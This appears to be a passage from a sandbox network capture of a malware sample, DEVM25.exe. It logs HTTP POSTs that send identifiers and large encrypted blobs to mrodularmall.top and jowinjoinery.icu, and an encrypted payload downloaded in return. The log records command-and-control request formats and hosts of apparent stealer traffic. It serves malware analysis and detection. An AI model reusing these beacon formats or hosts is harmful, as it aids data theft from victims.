2025-03-14 10:47:16 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
2025-03-14 10:47:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49689	104.21.80.1	443	1480	C:\Users\user\Desktop\DEVM25.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 10:47:17 UTC	277	OUT	POST /aNzS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=uWB6O025of0t User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20557 Host: mrodularmall.top
2025-03-14 10:47:17 UTC	15331	OUT	Data Raw: 2d 2d 75 57 42 36 4f 30 32 35 6f 66 30 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 30 36 38 37 38 34 65 66 64 33 63 66 39 63 32 30 37 64 38 31 34 35 36 61 30 66 33 62 32 33 61 31 38 65 38 31 36 32 36 39 63 66 37 37 66 30 33 63 66 66 63 38 65 32 30 0d 0a 2d 2d 75 57 42 36 4f 30 32 35 6f 66 30 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 75 57 42 36 4f 30 32 35 6f 66 30 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 36 38 43 33 31 Data Ascii: --uWB6O025of0tContent-Disposition: form-data; name="uid"a068784efd3cf9c207d81456a0f3b23a18e816269cf77f03cffc8e20--uWB6O025of0tContent-Disposition: form-data; name="pid"3--uWB6O025of0tContent-Disposition: form-data; name="hwid"9A68C31
2025-03-14 10:47:17 UTC	5226	OUT	Data Raw: fe 73 7f 7e 53 e5 16 f6 50 a1 31 e0 37 3f 29 b2 44 64 15 3e 7f a0 df be fc a2 ae d4 62 34 a9 7f 7a e4 cc f8 e0 ae 46 eb 52 34 f1 67 9c 7c cf ab 1c e7 ac 4b 4c 78 a6 55 b4 f2 ee 99 dc 30 86 da 18 c1 5f 38 8f 45 25 5a 0e 2b 29 e6 11 9c 44 45 cc 40 d4 90 c8 7e 58 85 f7 4e 42 07 8f 1e 25 95 71 71 a8 d6 e0 3d 09 69 5e 85 7b 84 6d 9c 90 f1 7b cf 68 6f 57 f7 73 23 fe 46 6b 51 aa 5f 2a 59 42 2b 62 c0 9a e0 6a 39 10 df e6 72 9e 8a c0 32 18 cc 52 71 2c fd 89 20 79 75 19 d3 dd 9d 49 2d 52 72 48 7d 24 1a b5 eb 76 af 26 d3 bb 44 35 3f 1c 3b bd b9 65 3e bf 7b 3c cb af 6c 56 df 08 28 40 de 83 48 23 70 08 f6 82 86 7f d9 91 89 c2 96 93 06 41 61 60 75 66 fa 69 9d 06 10 08 aa 0e 13 b6 00 91 5e 7e 54 6b 55 13 c4 85 67 00 89 4b 84 fc 64 ea 8c 3c df 85 e7 de a6 5a 18 1f db 54 Data Ascii: s~SP17?)Dd>b4zFR4g\|KLxU0_8E%Z+)DE@~XNB%qq=i^{m{hoWs#FkQ_*YB+bj9r2Rq, yuI-RrH}$v&D5?;e>{<lV(@H#pAa`ufi^~TkUgKd<ZT
2025-03-14 10:47:17 UTC	826	IN	HTTP/1.1 200 OK Date: Fri, 14 Mar 2025 10:47:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VfVXVTVdo%2FOiviPoR6BTUZXcfRkdhqpwnPWnfImedHhQ3%2FEiU3UI1HRTq%2FQUE%2BwoTOUhBZQv5kjI%2BPVkLM62Reg%2B1%2FoP6mOQhn7%2FkThAzBUB2MuQcDq5uRduez%2FZ%2BPLTvUh8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9203312cc81342c7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1582&rtt_var=628&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21514&delivery_rate=1696687&cwnd=237&unsent_bytes=0&cid=ac9c26597c07db53&ts=565&x=0"
2025-03-14 10:47:17 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
2025-03-14 10:47:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49691	104.21.80.1	443	1480	C:\Users\user\Desktop\DEVM25.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 10:47:19 UTC	276	OUT	POST /aNzS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=eH6UHssxL3ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2491 Host: mrodularmall.top
2025-03-14 10:47:19 UTC	2491	OUT	Data Raw: 2d 2d 65 48 36 55 48 73 73 78 4c 33 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 30 36 38 37 38 34 65 66 64 33 63 66 39 63 32 30 37 64 38 31 34 35 36 61 30 66 33 62 32 33 61 31 38 65 38 31 36 32 36 39 63 66 37 37 66 30 33 63 66 66 63 38 65 32 30 0d 0a 2d 2d 65 48 36 55 48 73 73 78 4c 33 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 65 48 36 55 48 73 73 78 4c 33 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 36 38 43 33 31 Data Ascii: --eH6UHssxL3ipContent-Disposition: form-data; name="uid"a068784efd3cf9c207d81456a0f3b23a18e816269cf77f03cffc8e20--eH6UHssxL3ipContent-Disposition: form-data; name="pid"1--eH6UHssxL3ipContent-Disposition: form-data; name="hwid"9A68C31
2025-03-14 10:47:19 UTC	809	IN	HTTP/1.1 200 OK Date: Fri, 14 Mar 2025 10:47:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O8E1f63kkEiUlojxrVwDWDATW7v8sWEGEZsjWz5OwqcSAlvXL6Fb%2BR0lDOKYGxgajYezbsWtAZiHYM8fvxYZTWR5Z07MPZrfo8mxkWg%2Fqlr8hCrQx7lYGuqIVMVg%2BTwmpgJ1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9203313aea5cdc28-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1631&rtt_var=625&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2838&recv_bytes=3403&delivery_rate=1731909&cwnd=214&unsent_bytes=0&cid=17c11835960abcad&ts=436&x=0"
2025-03-14 10:47:19 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
2025-03-14 10:47:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49694	104.21.80.1	443	1480	C:\Users\user\Desktop\DEVM25.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 10:47:21 UTC	278	OUT	POST /aNzS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=eGbsHo3RbF53 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 571314 Host: mrodularmall.top
2025-03-14 10:47:21 UTC	15331	OUT	Data Raw: 2d 2d 65 47 62 73 48 6f 33 52 62 46 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 30 36 38 37 38 34 65 66 64 33 63 66 39 63 32 30 37 64 38 31 34 35 36 61 30 66 33 62 32 33 61 31 38 65 38 31 36 32 36 39 63 66 37 37 66 30 33 63 66 66 63 38 65 32 30 0d 0a 2d 2d 65 47 62 73 48 6f 33 52 62 46 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 65 47 62 73 48 6f 33 52 62 46 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 36 38 43 33 31 Data Ascii: --eGbsHo3RbF53Content-Disposition: form-data; name="uid"a068784efd3cf9c207d81456a0f3b23a18e816269cf77f03cffc8e20--eGbsHo3RbF53Content-Disposition: form-data; name="pid"1--eGbsHo3RbF53Content-Disposition: form-data; name="hwid"9A68C31
2025-03-14 10:47:21 UTC	15331	OUT	Data Raw: 89 82 9c 39 3a 9e 69 d2 f3 6c ae 56 ce 7f 70 10 9e bf 3a 4d 96 84 f1 40 9e 6e d4 56 04 20 de 66 53 1a 58 5c be 89 f3 a9 34 dd 02 18 23 db 4c 95 a6 c0 38 b8 30 9e cb cc d2 1d c9 34 e9 aa 13 4e aa 97 e2 74 26 cc f7 cd 78 12 2d a7 92 66 4e 18 10 38 9f 36 5d 4d d0 93 96 b2 5c 7e 41 9b 21 44 5f 08 c4 0a 75 b8 1a da 26 89 2f 40 05 48 7a f6 b3 c3 6b d5 c7 e9 6f 8a 06 c2 54 b9 75 0e 5f a5 4a 7f 31 f7 08 a4 db 9e be 13 56 77 46 1b ad 82 40 cb 42 42 92 53 f0 6d e0 d0 5a 50 91 05 5a 7d de 68 ef c5 20 44 9f dc 06 24 5e 7e 7e cf 4d f6 c6 81 ec 5c e4 39 23 88 c6 e4 ce b1 5a d4 e7 68 d7 fc 38 94 a3 25 e9 f8 d8 6d 82 7e 61 32 0a f2 d0 fd 2d 84 c8 26 dd 9d ee c7 e6 5c 63 eb 21 8c 30 aa cc c1 5f a7 85 cf 6c 4c fd 4d 4b 30 47 2f cd f5 6e 9b b2 f6 84 23 d1 1d 6d fe 26 ae da Data Ascii: 9:ilVp:M@nV fSX\4#L804Nt&x-fN86]M\~A!D_u&/@HzkoTu_J1VwF@BBSmZPZ}h D$^~~M\9#Zh8%m~a2-&\c!0_lLMK0G/n#m&
2025-03-14 10:47:21 UTC	15331	OUT	Data Raw: a9 7e bf 7a 44 52 35 5a cd e4 28 83 63 38 28 81 91 99 02 ca 44 d7 05 05 29 ac 54 69 1c e8 c9 56 0d 5d 61 c0 1c 9d 79 b9 2a c5 9a 2d cf d3 1a 9c 7d c5 7c d8 ef 38 3c ab cf dd 9e 6e bd 4f c7 56 fd f9 5f ac ed 6b c7 1c 7c 0a 1a 93 e1 db 73 42 d7 3a bc c5 b2 e2 4f f9 77 85 88 17 50 85 33 4a 4b 26 e2 b8 59 3b 88 1b b7 d4 d0 ce 31 78 35 09 f6 5a c2 32 d4 ae 23 6d 65 09 c2 39 5a 63 f5 a0 79 2e 66 41 e8 94 cc 5c 05 07 02 74 68 aa ea df 01 93 d1 27 a1 79 29 1b cb 5f dd a6 c4 11 d6 04 92 db f2 4f 33 20 f2 e5 30 e8 9a 0a d6 25 01 b7 c9 38 63 66 f2 5e 48 42 78 32 aa 99 65 fa 71 1d cc 98 5e fc a7 b2 67 a4 ff dc 27 a0 9b 8c 22 26 ec b8 43 32 68 45 21 56 f8 b6 9f e2 f5 e6 57 ea 74 d8 5a 81 f3 ce 4a cd 37 c6 cf 26 fc b9 40 8e 31 d9 22 e4 a6 50 21 f5 e7 f7 52 75 ec 19 81 Data Ascii: ~zDR5Z(c8(D)TiV]ay*-}\|8<nOV_k\|sB:OwP3JK&Y;1x5Z2#me9Zcy.fA\th'y)_O3 0%8cf^HBx2eq^g'"&C2hE!VWtZJ7&@1"P!Ru
2025-03-14 10:47:21 UTC	15331	OUT	Data Raw: 07 77 df b2 7c de 61 6d 8f 22 1e 52 0e ae df 0d 6e e0 6c 9f 91 c3 16 55 15 03 ad 1f 52 b0 49 9e dd 02 3b 8a 7d ca 8d b4 3d ae 36 05 be f2 32 c6 d6 4d da 51 7b 9c 30 e6 72 2b 7e 20 6f 5d 06 8a e6 92 1d 86 64 10 fe 4d 28 14 00 57 2b 9a ab 32 ca a5 8b e6 f7 80 c7 0b fc d8 6a 6f 5d f5 85 29 0b de 78 24 9c e5 c3 d8 b4 48 5f e7 14 ae 10 d3 2b 35 27 b0 7b 00 31 3a 9b 5d dc 2b a2 e2 28 f1 4f f1 bc 07 f6 c0 7c f3 17 58 44 22 1f 4f 09 b3 68 20 93 57 90 cc 34 79 dc 00 2d 2c 3d ea 8f 1d 18 0c 58 62 0a 92 93 5d 24 30 9c 7e 99 e6 7e ac 2a aa b9 70 90 35 56 df bc 3d d9 b9 bc f3 2b a6 66 da 75 27 8f 90 9d 71 05 40 d8 ec 2c a7 a1 10 b6 1b 80 e9 0c 1c 79 46 d5 5d cf c9 fe fe 14 7a db 4d fd 79 81 fc 44 42 c1 f2 bd cd da 4b 8d 7e b8 65 55 29 a3 48 b4 ea 80 df fb f8 90 d9 1b Data Ascii: w\|am"RnlURI;}=62MQ{0r+~ o]dM(W+2jo])x$H_+5'{1:]+(O\|XD"Oh W4y-,=Xb]$0~~*p5V=+fu'q@,yF]zMyDBK~eU)H
2025-03-14 10:47:21 UTC	15331	OUT	Data Raw: d0 e8 86 c5 04 41 0a 35 22 3d 9a cc 77 b6 9a a9 9a 62 3d e1 4f 48 f7 55 5c fb 3b 64 57 e0 75 db 7c b6 f0 12 8d 52 30 30 43 5d 26 98 60 ca 3d f2 19 7d d8 08 4f 67 4b e4 94 14 43 80 55 ba 10 29 a3 f1 ca 15 2a b8 98 7e 4b 53 ab 91 b1 ff ea 19 c8 77 7d a1 41 3f 3f 0a 36 94 df 15 cf b1 63 6f 89 16 30 72 51 4e 4d fc b3 70 08 12 26 16 74 89 32 8d ae 94 23 7e 08 0f bc 68 51 f1 16 95 67 2b cf 6b 4b 23 c3 b4 ae 2d 01 aa f2 22 f4 91 84 2f 94 15 4a 6d 19 53 d4 b4 1c 6a 00 a2 11 07 37 0b ec f7 8e ea d1 3a 39 41 2f af 69 fa 5f 79 00 c7 9e 97 5a 3b 2c 1c 63 c7 07 36 9d 4b d8 3a 3d 2c 68 b8 c7 e0 0b 66 65 7c a3 48 f1 37 da 0c 75 68 81 da 8e d1 02 b1 cc 21 ff 64 a9 00 fe 55 38 0e e2 24 8d 84 d2 78 eb 4b b2 4a a6 c6 b9 4d 47 2c 38 4e 90 4e 00 76 21 06 12 92 ea 31 41 49 d1 Data Ascii: A5"=wb=OHU\;dWu\|R00C]&`=}OgKCU)*~KSw}A??6co0rQNMp&t2#~hQg+kK#-"/JmSj7:9A/i_yZ;,c6K:=,hfe\|H7uh!dU8$xKJMG,8NNv!1AI
2025-03-14 10:47:21 UTC	15331	OUT	Data Raw: 5e 75 28 9a 1f 4e df 7c 2d ad 2b dd 60 8d ed 5a c6 53 33 b7 de e4 ab 13 8b ff fc dd 48 ee f8 5f 3d 64 1f 89 87 f7 46 c1 92 7c 4d d8 1e 0b 11 fa 99 65 62 21 c5 a9 42 2f 6b 6d 4b ac e1 d3 43 6c 63 b0 34 8b 79 1f 0a f8 25 ab 72 5e 91 ec 30 a9 fc 22 13 04 59 7b 4f 78 e3 a4 f2 b7 87 d6 c9 cc 67 39 31 bc 21 86 3d a9 76 c0 ff 20 85 85 da 66 52 3e e9 53 66 cb d3 88 87 e1 e4 23 1c f1 18 d5 0e 0a fa c2 9e 73 9f b6 c2 e1 29 32 8c 46 46 18 9f e7 42 04 88 01 cc 34 fd 67 7b 7d 0d 99 28 c8 07 f4 e3 6e f5 66 aa 75 54 c6 bc af 4c 72 22 2a 3d 96 cc 7e f6 fd 27 84 be b0 8d a0 0b 8b 12 67 05 5d 5a 93 58 d7 98 ba 3f ba ee 93 c4 cc d9 d2 54 8c 3f 8a be 17 8f da 60 cb ec 25 cb 0c c0 13 df 91 97 29 7c aa f3 71 d3 8e e1 2d 3c 54 65 5e e3 95 75 4c 28 d9 8c 77 d8 7b b0 09 d4 1d 93 Data Ascii: ^u(N\|-+`ZS3H_=dF\|Meb!B/kmKClc4y%r^0"Y{Oxg91!=v fR>Sf#s)2FFB4g{}(nfuTLr"*=~'g]ZX?T?`%)\|q-<Te^uL(w{
2025-03-14 10:47:21 UTC	15331	OUT	Data Raw: 01 f7 1d d2 62 ac 63 35 6a 36 95 d4 e3 6a a6 aa 68 85 32 8c b9 8d 48 a9 f6 b1 86 fd f6 76 56 f1 01 a9 0d 7d 25 9b a9 61 2e df 3b 60 2c 5e b9 f9 e6 a1 9a 17 31 eb d7 f1 40 16 b2 cb fb 96 2b 3d fa e9 50 b2 27 18 0c 51 63 e0 b9 06 e2 ce 24 78 35 6d b6 d5 93 49 a0 c8 ad 45 d0 97 65 7a 2a 1f 14 04 80 8c d8 2d 4f 32 05 09 fc b1 b9 7a 7c f0 37 fa 19 4c 3c 2e da 69 fa 81 74 c7 b8 a4 a7 38 d5 04 3e c3 f8 95 e7 53 58 84 85 19 d5 2e bc d9 2b 04 11 8d a6 d6 fd 52 04 9f 5c 78 e9 3e 7f b7 cd 7a 58 c4 1b 35 b0 78 98 95 b4 2f 13 ea 62 7f 39 a8 72 e5 18 a7 cb c2 36 16 fa 18 2b f4 0f 17 50 76 5a 65 40 13 af b6 76 05 e0 5c 19 27 1d a8 6c 07 11 23 14 32 5e de 04 24 51 09 8e 1b b0 fb f0 b9 c3 66 c9 58 28 8b 1b 22 21 3f a5 a9 48 01 07 39 b2 31 69 27 4d 6d df a0 64 5a 78 de c6 Data Ascii: bc5j6jh2HvV}%a.;`,^1@+=P'Qc$x5mIEez*-O2z\|7L<.it8>SX.+R\x>zX5x/b9r6+PvZe@v\'l#2^$QfX("!?H91i'MmdZx
2025-03-14 10:47:21 UTC	15331	OUT	Data Raw: fc f6 5c e6 bf 41 ad 7e 24 1d f5 c6 b9 9f 2b 05 48 04 e1 1c 35 30 c7 38 f9 cb 8f a3 c1 84 a8 15 46 78 ae db e5 e1 43 e7 23 62 79 eb 4f 2e cd d1 1a d0 ea ec b2 13 cc db f1 c6 1d a6 6d b7 56 a6 d9 24 52 e5 e9 70 e5 0f 6b 9e 88 b9 94 fb ec 50 84 2a da eb 7f 91 b8 f3 f3 5c 51 68 6f 35 8e 8c de 1f 13 2b 85 9f 86 47 9e bf 81 64 60 70 c4 9e cc 36 6a 34 e7 42 32 0f e2 9a 03 04 78 75 ff b1 49 d4 53 9a 17 6e 4d c9 50 96 cb d4 ba d4 a8 3a 94 1b b5 b4 0c 1c 03 23 84 bb 50 c0 1a 34 6f dc d6 74 c8 4a 58 d8 e8 35 45 68 f8 16 96 bd 3f 3d 50 b8 b6 dc 23 14 fd 34 be 71 77 b2 22 72 cc 11 f9 63 b0 3a 69 3d a3 96 2f 15 aa c9 5b 5b 33 55 ec 4e a6 2c 62 67 ce f4 9c 52 75 23 cc be 97 c3 af 68 d9 d7 ef 38 2f c9 d8 e7 a4 1a 3d d5 6d 62 34 5c 2e 7b 73 a4 76 f3 5b 53 6d 13 30 a0 a4 Data Ascii: \A~$+H508FxC#byO.mV$RpkP*\Qho5+Gd`p6j4B2xuISnMP:#P4otJX5Eh?=P#4qw"rc:i=/[[3UN,bgRu#h8/=mb4\.{sv[Sm0
2025-03-14 10:47:21 UTC	15331	OUT	Data Raw: e9 be 3a 53 f1 30 85 c2 24 bf 7a 32 2e e8 28 8f fa 5c a2 f1 bd be 87 89 3e db ef a2 56 96 25 1b d3 a0 a1 0c 66 15 17 90 7e b0 42 66 93 d3 42 f0 ca 40 78 1b af df b2 86 f0 b1 37 c3 33 a9 d5 c5 f2 7c b3 2a 78 13 ad 8e d7 60 e7 1e 30 78 56 b3 66 c8 a0 f8 ca 38 4d fa 6a 78 01 c1 f5 24 8d 6a 78 b1 07 12 33 c3 4c 8c 24 03 f4 ec ef 44 fa 36 a2 e2 36 e8 82 d1 19 ac 30 3f 12 e6 b4 16 d0 e8 54 33 2d 23 5b d1 e3 68 80 f0 8f 87 a0 cb 4f 5b f5 d3 16 94 60 4c 13 6c d3 9d 94 8f 58 86 67 1a 21 6a 9f 8a 5c 52 7d 1c 8b 06 36 0c d0 a7 61 7b cf ff 9e 4c 8a 1a 16 dc 96 4f 23 7c d5 59 f1 72 eb 02 00 b6 84 f6 1c 2a eb 8c 1d bc 43 9d d9 f3 be d0 e4 b3 24 b0 1c d7 ac 6c c7 44 ba 5a 3d f3 42 c7 8e 2b 68 6e db d8 46 c8 2a 40 f2 fb f2 95 7a 3b 0d 20 cf c4 83 6f 67 fd 10 93 cf 0d 99 Data Ascii: :S0$z2.(\>V%f~BfB@x73\|x`0xVf8Mjx$jx3L$D660?T3-#[hO[`LlXg!j\R}6a{LO#\|YrC$lDZ=B+hnF*@z; og
2025-03-14 10:47:21 UTC	15331	OUT	Data Raw: b9 77 1b 7c 2f f5 03 87 29 f8 d1 34 2a c6 e6 90 86 a3 46 63 dd fd 9c 8b 06 e0 92 d0 a6 11 cb c0 07 3a 18 80 18 83 cb d3 9d c3 bf 85 52 5f f9 ca 28 d1 07 2b 99 f9 93 15 31 dc ee 1a 9f d4 26 74 37 3a b5 cb 7a 2a 83 ab 00 90 f1 a2 73 c8 55 35 c9 28 58 e3 fd 19 55 65 bd d9 6d 22 1d 8e 22 10 8a e6 47 b5 88 b5 34 37 fd 0c 73 1a a0 2f 91 0c d3 0c ff 13 70 9f 2d 0c 20 2b 30 b6 92 c0 85 80 13 fc b4 35 bb d7 4a 4a 76 f8 2b b3 05 0a 75 e9 22 28 35 62 f2 83 cb 27 1e 2d ec d2 d1 6d 12 31 eb bf 2d 96 b8 72 66 c9 07 5c 6b c5 1c 58 d0 fc ef d2 ea b3 df b0 e7 a3 a7 23 31 07 57 7a b6 c3 da 1b d5 5b 1d 46 06 ae 20 da 8a 64 eb 24 90 13 9a 2f cc c2 59 7c 96 67 70 1b 17 93 61 ff 67 a1 7d d7 7c 9c 2c f4 12 2b 3a 43 a9 55 32 da 75 e2 c3 02 2a 63 f6 92 5c 4e cd ec bd f0 fa f8 0a Data Ascii: w\|/)4Fc:R_(+1&t7:zsU5(XUem""G47s/p- +05JJv+u"(5b'-m1-rf\kX#1Wz[F d$/Y\|gpag}\|,+:CU2u*c\N
2025-03-14 10:47:22 UTC	818	IN	HTTP/1.1 200 OK Date: Fri, 14 Mar 2025 10:47:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XtU1Tse9FOL49pHnXuZKatDlEZ9nSZBV3ggDDy9j9M8fpB8YowD3dGGYg%2B%2FWh0GaEekB98RFP1kVvx1m7aiBSXHsyiWiR%2BCGP0RrfDlcSi6uowmeU0K%2BbOd0wSguvo5f9WJe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92033144e8bf41fe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1568&rtt_var=594&sent=343&recv=593&lost=0&retrans=0&sent_bytes=2839&recv_bytes=573856&delivery_rate=1831869&cwnd=205&unsent_bytes=0&cid=99b329448699ca23&ts=1515&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49696	188.114.97.3	443	1480	C:\Users\user\Desktop\DEVM25.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 10:47:23 UTC	267	OUT	POST /bdWUa HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 103 Host: jowinjoinery.icu
2025-03-14 10:47:23 UTC	103	OUT	Data Raw: 75 69 64 3d 61 30 36 38 37 38 34 65 66 64 33 63 66 39 63 32 30 37 64 38 31 34 35 36 61 30 66 33 62 32 33 61 31 38 65 38 31 36 32 36 39 63 66 37 37 66 30 33 63 66 66 63 38 65 32 30 26 63 69 64 3d 26 68 77 69 64 3d 39 41 36 38 43 33 31 37 36 44 31 46 33 46 42 37 38 30 43 38 36 42 39 33 32 41 38 35 44 30 38 42 Data Ascii: uid=a068784efd3cf9c207d81456a0f3b23a18e816269cf77f03cffc8e20&cid=&hwid=9A68C3176D1F3FB780C86B932A85D08B
2025-03-14 10:47:23 UTC	779	IN	HTTP/1.1 200 OK Date: Fri, 14 Mar 2025 10:47:23 GMT Content-Type: application/octet-stream Content-Length: 10602 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNJ2KK2zFRwghJ4C9V29OeJBvlpk790DxSl1HIMJt29CFRhakWAsN0944tdODvTPIijF%2BJKNrDiWwfGrEvlPVNtXmvHCQIFxypePw7SJNfNQ%2F2mdFEAO5nLtt4amMZ9OePTP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92033152c91c4271-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1724&rtt_var=657&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1006&delivery_rate=1650650&cwnd=252&unsent_bytes=0&cid=a2ef38778135ceec&ts=446&x=0"
2025-03-14 10:47:23 UTC	590	IN	Data Raw: 6d 55 0f 21 74 cc 88 1c 8b 8c af 82 81 8f 79 7a b5 32 9e 1a df 38 fd d3 7f 26 4b 06 f4 cf 1b e1 5d 51 35 44 a1 1c f8 8d 1f 41 47 73 be 13 1f a8 08 b7 e5 6d 8d ee ad 82 fb d5 c8 5e 0a 77 bd 8a 78 db 82 be 9b fe 6d dd 6c 49 6c fe 59 c5 4c 47 5f 51 7d 2a 72 4d ad 08 32 f4 52 04 69 28 f8 97 20 b6 95 13 1a e7 4e 2c 69 8d b3 b2 fb c9 90 0c c2 13 4d 82 f5 63 ff 85 98 9c 26 7a 5d 57 d5 98 48 78 bf 40 5e f1 e5 bf d9 b6 84 59 23 7f ff 39 aa 76 9f f7 ea 1b 5f f2 07 d7 6c 72 3d 36 fb d6 18 4c b8 4e de 35 73 f3 ae 93 72 c1 1e 8e 14 12 d9 15 7a 7b 4a c2 3b 26 09 a3 33 7f c9 63 dc 48 0a 68 5f 84 e7 a7 52 c8 58 b7 94 30 d5 b5 cc d0 b2 a4 5c 66 de 05 62 7c 66 fe fa f6 19 ac dc 2b 12 a5 77 77 53 b9 d5 84 a4 c3 e2 6f c7 8e a7 da f5 54 3c 03 51 cd eb 68 d8 18 7f 8e b8 60 58 Data Ascii: 